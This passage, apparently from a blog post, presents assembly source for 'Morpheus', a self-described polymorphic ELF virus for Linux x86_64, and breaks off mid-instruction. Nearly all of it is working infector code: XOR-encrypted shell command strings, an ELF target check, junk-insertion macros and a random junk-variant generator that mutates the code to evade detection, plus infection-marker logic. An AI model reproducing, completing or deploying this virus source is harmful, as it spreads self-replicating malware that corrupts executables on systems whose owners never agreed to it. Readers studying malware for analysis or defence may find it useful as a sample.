prefixed with <code>.morph8</code>. If the backup already exists, infection is skipped — acting as an “already morphed” marker.</p> <h3> — Morpheus Engine — </h3> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="c1">;;</span> <span class="c1">;; M O R P H E U S [ polymorphic ELF infector ]</span> <span class="c1">;; ------------------------------------------------</span> <span class="c1">;; stealth // mutation // syscall-only // junked //</span> <span class="c1">;; ------------------------------------------------</span> <span class="c1">;; 0xBADC0DE // .morph8 // Linux x86_64 // 0xf00sec</span> <span class="c1">;;</span> <span class="cp"> %define PUSH 0x50 %define POP 0x58 %define MOV 0xB8 %define NOP 0x90 %define REX_W 0x48 %define XCHG_OP 0x87 %define XCHG_BASE 0xC0 %define ADD_OP 0x01 %define AND_OP 0x21 %define XOR_OP 0x31 %define OR_OP 0x09 %define SBB_OP 0x19 %define SUB_OP 0x29 %define JUNKLEN 10 </span> <span class="c1">; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax</span> <span class="cp">%macro JUNK 0 </span> <span class="kd">db</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0xC3</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0xC3</span><span class="p">,</span> <span class="mh">0x5B</span><span class="p">,</span> <span class="mh">0x58</span> <span class="cp">%endmacro </span> <span class="nf">section</span> <span class="nv">.data</span> <span class="c1">; ELF header</span> <span class="nf">ELF_MAGIC</span> <span class="nv">dd</span> <span class="mh">0x464C457F</span> <span class="no">ELF_CLASS64</span><span class="kd"> equ</span> <span class="mi">2</span> <span class="no">ELF_DATA2LSB</span><span class="kd"> equ</span> <span class="mi">1</span> <span class="no">ELF_VERSION</span><span class="kd"> equ</span> <span class="mi">1</span> <span class="no">ELF_OSABI_SYSV</span><span class="kd"> equ</span> <span class="mi">0</span> <span class="no">ET_EXEC</span><span class="kd"> equ</span> <span class="mi">2</span> <span class="no">ET_DYN</span><span class="kd"> equ</span> <span class="mi">3</span> <span class="no">EM_X86_64</span><span class="kd"> equ</span> <span class="mi">62</span> <span class="nf">prefixes</span> <span class="nv">db</span> <span class="nv">ADD_OP</span><span class="p">,</span> <span class="nv">AND_OP</span><span class="p">,</span> <span class="nv">XOR_OP</span><span class="p">,</span> <span class="nv">OR_OP</span><span class="p">,</span> <span class="nv">SBB_OP</span><span class="p">,</span> <span class="nv">SUB_OP</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">bin_name</span> <span class="nv">times</span> <span class="mi">256</span> <span class="nv">db</span> <span class="mi">0</span> <span class="nf">orig_exec_name</span> <span class="nv">times</span> <span class="mi">256</span> <span class="nv">db</span> <span class="mi">0</span> <span class="nf">msg_cat</span> <span class="nv">db</span> <span class="err">"</span> <span class="o">/</span><span class="err">\</span><span class="nv">_</span><span class="o">/</span><span class="err">\</span> <span class="s">",10 db "</span><span class="p">(</span> <span class="nv">o.o</span> <span class="p">)</span><span class="s">",10 db "</span> <span class="o">&gt;</span> <span class="o">^</span> <span class="o">&lt;</span><span class="err">"</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span><span class="mi">0</span> <span class="c1">; payload</span> <span class="nf">current_dir</span> <span class="nv">db</span> <span class="s">"./"</span><span class="p">,</span><span class="mi">0</span> <span class="c1">; encrypted strings</span> <span class="nf">cmhd</span> <span class="nv">db</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x3D</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0x31</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0x2D</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x55</span> <span class="c1">; "chmod +x %s"</span> <span class="nf">tchh</span> <span class="nv">db</span> <span class="mh">0xAF</span><span class="p">,</span> <span class="mh">0xA4</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xA8</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0xB4</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0xBF</span><span class="p">,</span> <span class="mh">0xCC</span> <span class="c1">; "chmod +x %s"</span> <span class="nf">touc</span> <span class="nv">db</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0xC5</span><span class="p">,</span> <span class="mh">0xDF</span><span class="p">,</span> <span class="mh">0xC9</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0x8F</span><span class="p">,</span> <span class="mh">0xD9</span><span class="p">,</span> <span class="mh">0xAA</span> <span class="c1">; "touch %s"</span> <span class="nf">cpcm</span> <span class="nv">db</span> <span class="mh">0x9C</span><span class="p">,</span> <span class="mh">0x8F</span><span class="p">,</span> <span class="mh">0xDF</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0x8C</span><span class="p">,</span> <span class="mh">0xDF</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0x8C</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="c1">; "cp %s %s"</span> <span class="nf">hidd</span> <span class="nv">db</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0x1A</span><span class="p">,</span> <span class="mh">0x18</span><span class="p">,</span> <span class="mh">0x05</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0x1F</span><span class="p">,</span> <span class="mh">0x4F</span><span class="p">,</span> <span class="mh">0x77</span> <span class="c1">; ".morph8"</span> <span class="nf">exec</span> <span class="nv">db</span> <span class="mh">0x1D</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x33</span> <span class="c1">; "./%s"</span> <span class="nf">vxxe</span> <span class="nv">db</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0xF0</span><span class="p">,</span> <span class="mh">0x88</span> <span class="c1">; "vxx"</span> <span class="nf">xor_keys</span> <span class="nv">db</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0xCC</span><span class="p">,</span> <span class="mh">0x33</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x77</span> <span class="nf">vierge_val</span> <span class="nv">db</span> <span class="mi">1</span> <span class="c1">; first generation marker</span> <span class="nf">signme</span> <span class="nv">dd</span> <span class="mh">0xF00C0DE</span> <span class="c1">; PRNG seed</span> <span class="nf">section</span> <span class="nv">.bss</span> <span class="nf">code</span> <span class="nv">resb</span> <span class="mi">65536</span> <span class="c1">; viral body</span> <span class="nf">codelen</span> <span class="nv">resq</span> <span class="mi">1</span> <span class="nf">vierge</span> <span class="nv">resb</span> <span class="mi">1</span> <span class="c1">; generation flag</span> <span class="nf">dir_buf</span> <span class="nv">resb</span> <span class="mi">4096</span> <span class="nf">temp_buf</span> <span class="nv">resb</span> <span class="mi">1024</span> <span class="nf">elf_header</span> <span class="nv">resb</span> <span class="mi">64</span> <span class="c1">; runtime decrypted strings</span> <span class="nf">touch_cmd_fmt</span> <span class="nv">resb</span> <span class="mi">32</span> <span class="nf">chmod_cmd_fmt</span> <span class="nv">resb</span> <span class="mi">32</span> <span class="nf">touch_chmod_fmt</span> <span class="nv">resb</span> <span class="mi">32</span> <span class="nf">exec_cmd_fmt</span> <span class="nv">resb</span> <span class="mi">32</span> <span class="nf">cp_cmd_fmt</span> <span class="nv">resb</span> <span class="mi">32</span> <span class="nf">vxx_str</span> <span class="nv">resb</span> <span class="mi">8</span> <span class="nf">hidden_prefix</span> <span class="nv">resb</span> <span class="mi">16</span> <span class="nf">section</span> <span class="nv">.text</span> <span class="nf">global</span> <span class="nv">_start</span> <span class="cp">%define SYS_read 0 %define SYS_write 1 %define SYS_open 2 %define SYS_close 3 %define SYS_exit 60 %define SYS_lseek 8 %define SYS_getdents64 217 %define SYS_access 21 %define SYS_getrandom 318 %define SYS_execve 59 %define SYS_fstat 5 %define SYS_mmap 9 %define SYS_brk 12 %define SYS_fork 57 %define SYS_wait4 61 %define F_OK 0 %define X_OK 1 %define W_OK 2 %define O_RDONLY 0 %define O_WRONLY 1 %define O_RDWR 2 %define O_CREAT 64 %define O_TRUNC 512 %define PROT_READ 1 %define PROT_WRITE 2 %define MAP_PRIVATE 2 %define MAP_ANONYMOUS 32 </span> <span class="nf">section</span> <span class="nv">.rodata</span> <span class="nf">shell_path</span> <span class="nv">db</span> <span class="err">"</span><span class="o">/</span><span class="nv">bin</span><span class="o">/</span><span class="nv">sh</span><span class="s">",0 sh_arg0 db "</span><span class="nv">sh</span><span class="s">",0 sh_arg1 db "</span><span class="o">-</span><span class="nv">c</span><span class="err">"</span><span class="p">,</span><span class="mi">0</span> <span class="c1">; syscall wrappers with junk insertion</span> <span class="nl">sys_write:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_write</span> <span class="nf">JUNK</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_read:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_read</span> <span class="nf">JUNK</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_open:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_open</span> <span class="nf">JUNK</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_close:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_close</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_lseek:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_lseek</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_access:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_access</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_getdents64:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_getdents64</span> <span class="nf">syscall</span> <span class="nf">ret</span> <span class="nl">sys_exit:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_exit</span> <span class="nf">syscall</span> <span class="c1">; validate ELF executable target</span> <span class="nl">is_elf:</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">O_RDONLY</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">call</span> <span class="nv">sys_open</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.not_elf</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">elf_header</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">64</span> <span class="nf">call</span> <span class="nv">sys_read</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">call</span> <span class="nv">sys_close</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">64</span> <span class="nf">jl</span> <span class="nv">.not_elf</span> <span class="c1">; validate ELF magic</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">elf_header</span> <span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">],</span> <span class="mh">0x464C457F</span> <span class="nf">jne</span> <span class="nv">.not_elf</span> <span class="c1">; 64-bit only</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rsi</span> <span class="o">+</span> <span class="mi">4</span><span class="p">],</span> <span class="mi">2</span> <span class="nf">jne</span> <span class="nv">.not_elf</span> <span class="c1">; executable or shared object</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span> <span class="o">+</span> <span class="mi">16</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">ax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">je</span> <span class="nv">.valid</span> <span class="nf">cmp</span> <span class="nb">ax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">jne</span> <span class="nv">.not_elf</span> <span class="nl">.valid:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.not_elf:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="c1">; string utilities</span> <span class="nl">basename:</span> <span class="c1">; extract filename from path</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nl">.find_last_slash:</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.done</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="s">'/'</span> <span class="nf">jne</span> <span class="nv">.next_char</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">jmp</span> <span class="nv">.find_last_slash</span> <span class="nl">.next_char:</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">jmp</span> <span class="nv">.find_last_slash</span> <span class="nl">.done:</span> <span class="nf">ret</span> <span class="nl">strlen:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">xor</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nl">.strlen_loop:</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span> <span class="o">+</span> <span class="nb">rcx</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.strlen_done</span> <span class="nf">inc</span> <span class="nb">rcx</span> <span class="nf">jmp</span> <span class="nv">.strlen_loop</span> <span class="nl">.strlen_done:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">ret</span> <span class="nl">strcpy:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nl">.cp_loop:</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">mov</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="nb">bl</span> <span class="nf">inc</span> <span class="nb">rdi</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">cmp</span> <span class="nb">bl</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">jne</span> <span class="nv">.cp_loop</span> <span class="nf">ret</span> <span class="nl">strcmp:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nl">.cmp_loop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">jne</span> <span class="nv">.not_equal</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.equal</span> <span class="nf">inc</span> <span class="nb">rdi</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">jmp</span> <span class="nv">.cmp_loop</span> <span class="nl">.equal:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.not_equal:</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">movzx</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">ret</span> <span class="nl">strstr:</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.found</span> <span class="nl">.scan:</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nv">r8</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">jz</span> <span class="nv">.not_found</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">je</span> <span class="nv">.check_match</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">jmp</span> <span class="nv">.scan</span> <span class="nl">.check_match:</span> <span class="nf">mov</span> <span class="nv">r10</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="nv">r11</span><span class="p">,</span> <span class="nv">r9</span> <span class="nl">.match_loop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r11</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">jz</span> <span class="nv">.found</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nv">r10</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">jz</span> <span class="nv">.not_found</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">jne</span> <span class="nv">.next_pos</span> <span class="nf">inc</span> <span class="nv">r10</span> <span class="nf">inc</span> <span class="nv">r11</span> <span class="nf">jmp</span> <span class="nv">.match_loop</span> <span class="nl">.next_pos:</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">jmp</span> <span class="nv">.scan</span> <span class="nl">.found:</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r8</span> <span class="nf">ret</span> <span class="nl">.not_found:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">ret</span> <span class="c1">; PRNG</span> <span class="nl">get_random:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">si</span><span class="nv">gnme</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">eax</span> <span class="nf">shr</span> <span class="nb">edx</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">edx</span> <span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">eax</span> <span class="nf">shr</span> <span class="nb">edx</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">edx</span> <span class="nf">mov</span> <span class="p">[</span><span class="nb">si</span><span class="nv">gnme</span><span class="p">],</span> <span class="nb">eax</span> <span class="nf">ret</span> <span class="nl">get_range:</span> <span class="c1">; random in range 0-ecx</span> <span class="nf">call</span> <span class="nv">get_random</span> <span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span> <span class="nf">div</span> <span class="nb">ecx</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">edx</span> <span class="nf">ret</span> <span class="c1">; decrypt string with indexed key</span> <span class="nl">d_strmain:</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">push</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nv">xor_keys</span> <span class="nf">add</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r8</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; clear dest buffer</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">xor</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">bl</span> <span class="nf">rep</span> <span class="nv">stosb</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nl">.d_loop:</span> <span class="nf">test</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">jz</span> <span class="nv">.d_done</span> <span class="nf">mov</span> <span class="nb">bl</span><span class="p">,</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">]</span> <span class="nf">xor</span> <span class="nb">bl</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">mov</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">],</span> <span class="nb">bl</span> <span class="nf">inc</span> <span class="nb">rdi</span> <span class="nf">inc</span> <span class="nb">rsi</span> <span class="nf">dec</span> <span class="nb">rcx</span> <span class="nf">jmp</span> <span class="nv">.d_loop</span> <span class="nl">.d_done:</span> <span class="nf">pop</span> <span class="nv">r8</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="nf">ret</span> <span class="c1">; decrypt all strings at runtime</span> <span class="nl">d_str:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">touc</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">touch_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">9</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">cmhd</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">ch</span><span class="nv">mod_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">12</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">tchh</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">touch_chmod_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">12</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">exec</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">exec_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">cpcm</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">cp_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">9</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">vxxe</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">vxx_str</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">hidd</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">hidden_prefix</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">6</span> <span class="nf">call</span> <span class="nv">d_strmain</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">ret</span> <span class="c1">; 4 variants</span> <span class="nl">spawn_junk:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">push</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; dst buffer</span> <span class="nf">call</span> <span class="nv">get_random</span> <span class="nf">and</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="c1">; 4 variants</span> <span class="nf">cmp</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.variant_0</span> <span class="nf">cmp</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">je</span> <span class="nv">.variant_1</span> <span class="nf">cmp</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">je</span> <span class="nv">.variant_2</span> <span class="nf">jmp</span> <span class="nv">.variant_3</span> <span class="nl">.variant_0:</span> <span class="c1">; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mh">0x50</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">1</span><span class="p">],</span> <span class="mh">0x53</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">3</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">4</span><span class="p">],</span> <span class="mh">0xC3</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">5</span><span class="p">],</span> <span class="mh">0x48</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="o">+</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x87</span> <span class="nf">mov</span> <span 